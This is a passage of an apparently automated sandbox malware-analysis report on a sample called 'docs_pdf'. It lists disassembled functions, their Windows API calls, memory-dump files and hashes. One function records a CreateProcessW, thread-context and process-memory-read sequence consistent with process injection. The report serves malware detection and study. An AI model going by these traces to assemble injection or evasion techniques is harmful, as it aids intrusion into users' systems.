                                                            • Instruction Fuzzy Hash: 6301D231201B29DFEB1D2B64EC42AEE724A9FA1B38F51413AF4009A281DB709DC18262
                                                            Function 00159B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,001597D2,?,?,?,?,?,00000004), ref: 00159B45
                                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,001597D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00159B5B
                                                            • CloseHandle.KERNEL32(00000000,?,001597D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00159B62
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleTime
                                                            • String ID:
                                                            • API String ID: 3397143404-0
                                                            • Opcode ID: f6a93abb7ddaada1e389cfa716029187950fd814186e662b1c62c0d9ca2a15ec
                                                            • Instruction ID: 2fab6ff5e01edd1b8ae4540883b7d7caebf12c25197d263533dcc464c110d499
                                                            • Opcode Fuzzy Hash: f6a93abb7ddaada1e389cfa716029187950fd814186e662b1c62c0d9ca2a15ec
                                                            • Instruction Fuzzy Hash: E8E08632581214F7E7212B64EC09FCB7B68AB05761F104124FB28690E087B12592D798
                                                            Function 00158F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00158FA5
                                                              • Part of subcall function 00112F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00119C64), ref: 00112FA9
                                                              • Part of subcall function 00112F95: GetLastError.KERNEL32(00000000,?,00119C64), ref: 00112FBB
                                                            • _free.LIBCMT ref: 00158FB6
                                                            • _free.LIBCMT ref: 00158FC8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                                            • Instruction ID: c8d58b55bdd2926c0f6878dc76f1410aa55a5cce7ec62b1bf1430284773cfe0e
                                                            • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                                            • Instruction Fuzzy Hash: 71E012A170D7028ADE28A578BD44AD357EE5F4C352B18082EF859EF142EF34EC968124
                                                            Function 000FAB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CALL
                                                            • API String ID: 0-4196123274
                                                            • Opcode ID: 9b4290b02ddd0b13495aef1e3d6082ed4c42744bc98c44740bfd1f13077ea25d
                                                            • Instruction ID: 215d21edc82f21e3d536f96a6059156b7b64d2d7fbcd5addce7a26614c243e5f
                                                            • Opcode Fuzzy Hash: 9b4290b02ddd0b13495aef1e3d6082ed4c42744bc98c44740bfd1f13077ea25d
                                                            • Instruction Fuzzy Hash: E02249B0608205DFC724DF14C494B6ABBE1BF89300F15896DF98A8B762D731ED85DB82
                                                            Function 000F4DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: EA06
                                                            • API String ID: 4104443479-3962188686
                                                            • Opcode ID: 188f2d6ade58a979bed24ff8831e52c4b82698ff43c126796e6d782148184cce
                                                            • Instruction ID: 33bdc62d2d0127d62331194d8bea45c87ae10c3a8cf9cba72e3dcf9f4a328364
                                                            • Opcode Fuzzy Hash: 188f2d6ade58a979bed24ff8831e52c4b82698ff43c126796e6d782148184cce
                                                            • Instruction Fuzzy Hash: 0C417C21A0415C6BDF219B64DC917FF7FA6AB05300F684074FF82ABA83C6618E44A3A1
                                                            Function 000F5DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,000F5981,?,?,?,?), ref: 000F5E27
                                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,000F5981,?,?,?,?), ref: 0012E19C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 011b23aec23b79ea96908a113987003611e02ecdc3cb3532ff1bf2ec853106c8
                                                            • Instruction ID: 2de154d232f2212806be47fe51f7424a321714321ddbe8af8951631107eb0bfd
                                                            • Opcode Fuzzy Hash: 011b23aec23b79ea96908a113987003611e02ecdc3cb3532ff1bf2ec853106c8
                                                            • Instruction Fuzzy Hash: A6019270244708BEF7685E24DC8AF763ADCAB01769F108328BBE55A5E0C6B01E959B50
                                                            Function 00110FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0011594C: __FF_MSGBANNER.LIBCMT ref: 00115963
                                                              • Part of subcall function 0011594C: __NMSG_WRITE.LIBCMT ref: 0011596A
                                                              • Part of subcall function 0011594C: RtlAllocateHeap.NTDLL(00E80000,00000000,00000001,00000000,?,?,?,00111013,?), ref: 0011598F
                                                            • std::exception::exception.LIBCMT ref: 0011102C
                                                            • __CxxThrowException@8.LIBCMT ref: 00111041
                                                              • Part of subcall function 001187DB: RaiseException.KERNEL32(?,?,?,001ABAF8,00000000,?,?,?,?,00111046,?,001ABAF8,?,00000001), ref: 00118830
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 3902256705-0
                                                            • Opcode ID: 8f0142fcf2ad61d82fd9bffa00e05d2ac03c94d179ad951e46275d7147eb8185
                                                            • Instruction ID: 874169f00e267624ed70d1b1424034f60c9cc1e9ee0195a8a64e96d747db5b1c
                                                            • Opcode Fuzzy Hash: 8f0142fcf2ad61d82fd9bffa00e05d2ac03c94d179ad951e46275d7147eb8185
                                                            • Instruction Fuzzy Hash: 9DF0F43590025DB6CB29BE98ED019DFBBE99F14350F204535F904A2181DFB18BC0C6E1
                                                            Function 0011582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: __lock_file_memset
                                                            • String ID:
                                                            • API String ID: 26237723-0
                                                            • Opcode ID: 7d972b5e9374a8c79d9bc5020c60d3fef8d18bea398c23824c0e762d218d07c1
                                                            • Instruction ID: 9a639993686ff95061646cf5fc186802679a94da47046ebac4b362a34c0a8169
                                                            • Opcode Fuzzy Hash: 7d972b5e9374a8c79d9bc5020c60d3fef8d18bea398c23824c0e762d218d07c1
                                                            • Instruction Fuzzy Hash: 96018871800A05EBCF19AF6A8C015DE7B62AF91360F148235B8145A161DB3186A1DB91
                                                            Function 001155D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00118D68: __getptd_noexit.LIBCMT ref: 00118D68
                                                            • __lock_file.LIBCMT ref: 0011561B
                                                              • Part of subcall function 00116E4E: __lock.LIBCMT ref: 00116E71
                                                            • __fclose_nolock.LIBCMT ref: 00115626
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                            • String ID:
                                                            • API String ID: 2800547568-0
                                                            • Opcode ID: bbe6e048c9f433f60888c45f6518a53b8fc33ab407e49b4582b1480bf4f4d34c
                                                            • Instruction ID: 75e1afff900b1a926edf90bbbee637360259f6d2b4d65d7297b594f8d7209795
                                                            • Opcode Fuzzy Hash: bbe6e048c9f433f60888c45f6518a53b8fc33ab407e49b4582b1480bf4f4d34c
                                                            • Instruction Fuzzy Hash: 30F02B71804B00DAD72CAF7588027DE77E21F91334F658225A410AB0C1CF7C49C1CB95
                                                            Function 036E129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 036E1A5B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 036E1AF1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 036E1B13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106556596.00000000036E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_36e0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                                            • Instruction ID: 8539764389f5d4a61a4a5351f473e67a59a50f345f0589cab5fbd89f292a27fb
                                                            • Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                                            • Instruction Fuzzy Hash: 1612CD24E24658C6EB24DF64D8507DEB232EF68300F1090E9D10DEB7A5E77A4E85CF5A
                                                            Function 00102123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fb5e1463641142d382c2d1adb152571fb06803d924798c3f18e03bed687c14ef
                                                            • Instruction ID: f44d9b528a67375c24616bfd83d05aa41f852920b1128c206707e1aea15c74a6
                                                            • Opcode Fuzzy Hash: fb5e1463641142d382c2d1adb152571fb06803d924798c3f18e03bed687c14ef
                                                            • Instruction Fuzzy Hash: B651A135600604AFCF18EB64CD96FBE77A6AF49314F158068FA46AB392CB70ED00DB51
                                                            Function 000F766F Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 0f93539bf87354248685b11ab5cef8e514fcd7301a448428a953d4023ae7aa7a
                                                            • Instruction ID: cba2000290b9dd593cf672292ba7a452ce04a890f52e65e355d2a877417a70f4
                                                            • Opcode Fuzzy Hash: 0f93539bf87354248685b11ab5cef8e514fcd7301a448428a953d4023ae7aa7a
                                                            • Instruction Fuzzy Hash: 3431A279608A06DFC728AF18D490975F7E0FF08310714C569EA8ECBB65E770D881DB86
                                                            Function 000F5C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 000F5CF6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: 18537ed2a82ae2ccc2f2f32811352c977c9c6b0577045eab70d7731457740a1a
                                                            • Instruction ID: c3488b5b51ff1f938d71e9471b3322269bf93ff5c38868bef9c7db5f20d0eb68
                                                            • Opcode Fuzzy Hash: 18537ed2a82ae2ccc2f2f32811352c977c9c6b0577045eab70d7731457740a1a
                                                            • Instruction Fuzzy Hash: C7314F71A00B19AFCB18DF2DC8846ADB7B5FF48311F148629DA1993B10D771B960EBD0
                                                            Function 001300D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: 9764c95ec120964444a670ff4770a8adace9a4d353e7dd7710a8ab2c8083d6b2
                                                            • Instruction ID: 0f1beeaf305b2bd541983d5390e68d7549f1b5f3990f66b5aa36779c67618221
                                                            • Opcode Fuzzy Hash: 9764c95ec120964444a670ff4770a8adace9a4d353e7dd7710a8ab2c8083d6b2
                                                            • Instruction Fuzzy Hash: AA410BB4604345DFDB25DF14C494B2ABBE0BF49314F1988ACE5898B762C335E885DF52
                                                            Function 000F79AB Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 64602025b210a69d44d795642d596fdfc93abb49ffaa1266944914acc7b2a18e
                                                            • Instruction ID: d8f272d043479354b176b6120d5303a37a9453ec22184a11c0969b8d51b768e0
                                                            • Opcode Fuzzy Hash: 64602025b210a69d44d795642d596fdfc93abb49ffaa1266944914acc7b2a18e
                                                            • Instruction Fuzzy Hash: 0C110A31608109AFC714DF18C481CBEB398EF89320765851AFA19CB691DB32EC119BD2
                                                            Function 000FC707 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _wcscmp
                                                            • String ID:
                                                            • API String ID: 856254489-0
                                                            • Opcode ID: f8449ce6c620002830823e333deae84b0db38a043328764bbd702b0ba41c96f1
                                                            • Instruction ID: a6df22a95c3bcd5b5013e9b6e68873350cb6d85b96e369ed9b4c9ca84ba79f63
                                                            • Opcode Fuzzy Hash: f8449ce6c620002830823e333deae84b0db38a043328764bbd702b0ba41c96f1
                                                            • Instruction Fuzzy Hash: 5311D23290421CEBDB14EBA9DC82DFEF778EF91360F104126EA14A7591EB309D05EB91
                                                            Function 000F4F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F4D13: FreeLibrary.KERNEL32(00000000,?), ref: 000F4D4D
                                                              • Part of subcall function 0011548B: __wfsopen.LIBCMT ref: 00115496
                                                            • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,001B62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 000F4F6F
                                                              • Part of subcall function 000F4CC8: FreeLibrary.KERNEL32(00000000), ref: 000F4D02
                                                              • Part of subcall function 000F4DD0: _memmove.LIBCMT ref: 000F4E1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Library$Free$Load__wfsopen_memmove
                                                            • String ID:
                                                            • API String ID: 1396898556-0
                                                            • Opcode ID: 868f1b219df9d002f9ba09b7eb4e4af46584c6191f09de324b9c2adacc30e166
                                                            • Instruction ID: 5b7df42c2020a891fd0f83d2d6b78c9fbd5bf2286616ddcae8420f9df0d7bb92
                                                            • Opcode Fuzzy Hash: 868f1b219df9d002f9ba09b7eb4e4af46584c6191f09de324b9c2adacc30e166
                                                            • Instruction Fuzzy Hash: A611E33160060DAACB24AF70DC46BFF77A99F40711F10842DFB49A69C3DF759A15ABA0
                                                            Function 001301AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: d281a1f95e2d4d1000993ebd03398437e9f62b3517df632efdbf131fbb3fd3c3
                                                            • Instruction ID: ddc2a2667da43a0ae78f229fbf2d8257c3f4e7bc392bfdb10faa333d11900019
                                                            • Opcode Fuzzy Hash: d281a1f95e2d4d1000993ebd03398437e9f62b3517df632efdbf131fbb3fd3c3
                                                            • Instruction Fuzzy Hash: 032135B4A08345DFCB24DF14C444B6ABBE0BF89314F05896CFA8A57B21C731E845DB52
                                                            Function 000F5D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,000F5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 000F5D76
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
